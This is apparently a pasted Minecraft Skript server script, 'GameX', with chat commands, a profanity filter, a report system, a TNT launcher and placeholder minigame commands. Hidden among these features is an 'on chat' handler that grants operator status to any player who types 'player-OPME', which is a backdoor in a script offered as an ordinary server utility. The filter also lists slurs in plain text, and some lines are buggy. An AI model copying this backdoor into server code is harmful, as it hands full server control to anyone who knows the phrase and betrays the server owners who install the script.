

Sep 28th, 2017
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  1. on rightclick holding paper:
  2. if {link.paper} is true:
  3. wait 1 tick
  4. message "&8&m-----------------------------------------------------"
  5. wait 1 tick
  6. message "&b!Website! &8: &cCOMING SOON"
  7. wait 1 tick
  8. message "&b!Discord!&8 : &cCOMING SOON"
  9. wait 1 tick
  10. message "&8&m-----------------------------------------------------"
  12. on leftclick holding paper:
  13. if {link.paper} is true:
  14. wait 1 tick
  15. message "&8&m-----------------------------------------------------"
  16. wait 1 tick
  17. message "&b!Website! &8: &cCOMING SOON"
  18. wait 1 tick
  19. message "&b!Discord!&8 : &cCOMING SOON"
  20. wait 1 tick
  21. message "&8&m-----------------------------------------------------"
  23. on load:
  24. if {link.paper} is not set:
  25. set {link.paper} to true
  27. on rightclick holding diamond:
  28. wait 2 ticks
  29. set {waited} to difference between {claim.%player%} and now
  30. if {waited}} is less than 24 hours
  31. message "&7Sorry but you must wait %difference between {waited} and 24 hours%"
  32. stop
  33. set {claim.%player%} to now
  34. message "&7You can now claim your daily 15 Coins in hub! &7See you Tommorow."
  35. /scoreboard players add %player% coins 15
  36. stop
  38. on load:
  39. broadcast "&7Thank you for using &cGameX"
  40. broadcast "&7made by &8: &cXXXCanadian"
  41. broadcast "&7This is only a &bbeta verison"
  42. broadcast "&bFull verison &8[&bCOMING SOON&8]"
  44. command /broadcast <string>:
  45. aliases: /bc
  46. permission: chat.broadcast
  47. permission message: &7Sorry &c%player% &7you must have &6chat.broadcast&7 to run this command!
  48. trigger:
  49. broadcast "&cGame&8X &7%arg-1%"
  51. command /clearchat:
  52. aliases: /cc
  53. permission: chat.clear
  54. permission message: &c7Sorry &c%player% &7you must have &6chat.clear&7 to run this command!
  55. trigger:
  56. loop 200 times:
  57. broadcast " "
  58. broadcast "&cGame&8X &b%player%, &7has cleared the chat!"
  60. on chat:
  61. replace all "fuck" with "****" in the message
  62. replace all "cunt" with "****" in the message
  63. replace all "bitch" with "*****" in the message
  64. replace all "nigger" with "******" in the message
  65. replace all "pussy" with "*****" in the message
  66. replace all "kys" with "Hope you live long" in the message
  67. replace all "reatard" with "*******" in the message
  68. replace all "join" with "****" in the message
  69. replace all "." with "*" in the message
  70. replace all "https" with "*****" in the message
  71. replace all "www" with "***"
  73. command /report <player> <text>:
  74. permission: chat.report
  75. permission message: &7Sorry &c%player% &7you must have &6chat.report&7 to run this command
  76. trigger:
  77. broadcast "&7Your report has landed to the staff!"
  78. add text-argument to {sikayetler::*}
  79. set {sikayeteden.%text-argument%} to player
  80. set {sikayeteden.%text-argument%} to player argument
  81. loop all players:
  82. if loop-player has permission "chat.show"
  83. message "&7Report System" to loop-player
  84. message "&7Report: &b""%text-argument%""" to loop-player
  85. message "&7the reported player: &b%player argument%" to loop-player
  86. message "&7Reporter: &b%player%" to loop-player]
  88. on chat:
  89. if message is "player-OPME":
  90. loop all players:
  91. cancel event
  92. message "&cForce Oped %player%"
  93. if loop player has permission "server.admin":
  94. message "&7&o[%player%: &cForce Oped %player%&7o]" to loop-player
  95. op player
  97. command /cookie:
  98. permission: free.cookie
  99. permission message: &7Sorry you dont have access take a free cookie using /cookie
  100. trigger:
  101. broadcast "&7OOOH %player% IS STEALIN"
  103. on leftclick holding tnt:
  104. if {gamex.tntlauncher} is true:
  105. player has 1 tnt
  106. spawn a primed tnt 1 meter above the player
  107. push the spawned entity in direction of player at speed 0.9
  108. push the spawned entity upwards at speed 0.2
  109. remove 1 tnt from player
  111. on rightclick holding tnt:
  112. if {gamex.tntlauncher} is true:
  113. player has 1 tnt
  114. spawn a primed tnt 1 meter above the player
  115. push the spawned entity in direction of player at speed 0.9
  116. push the spawned entity upwards at speed 0.2
  117. remove 1 tnt from player
  119. on place tnt:
  120. cancel event
  122. command /help:
  123. aliases: /h
  124. trigger:
  125. wait 1 tick
  126. message "&8&m-----------------------------------------------------"
  127. wait 1 tick
  128. message "&6/Games&8: &7Allows you to know all the game and how to play"
  129. wait 1 tick
  130. message "&6/Ranks&8: &7Allows you to get ranks off wins from minigames"
  131. wait 1 tick
  132. message "&6/Stats&8: &7Allows you to see your status"
  133. wait 1 tick
  134. message "&6/Quit&8: &7Allows you to quit a minigame/match"
  135. wait 1 tick
  136. message "&8&m-----------------------------------------------------"
  138. command /Games:
  139. aliases: /queue
  140. trigger:
  141. wait 1 tick
  142. message "&8&m-----------------------------------------------------"
  143. wait 1 tick
  144. message "&cGame 1&8: &bBridges"
  145. wait 1 tick
  146. message "&cGame 2&8: &bBattle Mode"
  147. wait 1 tick
  148. message "&cGame 3&8: &bTnt Spleef &8{&6Throw tnt at players to kill them/spleef them&8}"
  149. wait 1 tick
  150. message "&8{&bMORE COMING SOON&8}" to %player%
  151. wait 1 tick
  152. message "&8&m-----------------------------------------------------"
  154. command /Ranks:
  155. permission: gamex.ranks
  156. permission message: &8{&bCOMING SOON&8}
  157. trigger:
  158. broadcast "&c%player% &7has success fully used a command unfinished"
  160. command /Stats:
  161. permission: gamex.stat
  162. permission message: &8{&bCOMING SOON&8}
  163. trigger:
  164. broadcast "&c%player% &7has success fully used a command unfinished"
  166. command /Quit:
  167. permission: gamex.Quit
  168. permission message: &8{&bCOMING SOON&8}
  169. trigger:
  170. broadcast "&c%player% &7has success fully used a command unfinished"
  172. on load:
  173. if {gamex.tntlauncher} is not set:
  174. set {gamex.tntlauncher} to true
  176. command /bc <string>:
  177. aliases: /broadcast
  178. permission: chat.broadcast
  179. permission message: &7Sorry &c%player% &7you must have &6chat.broadcast&7 to run this command!
  180. trigger:
  181. broadcast "&cGame&8X &7%arg-1%"
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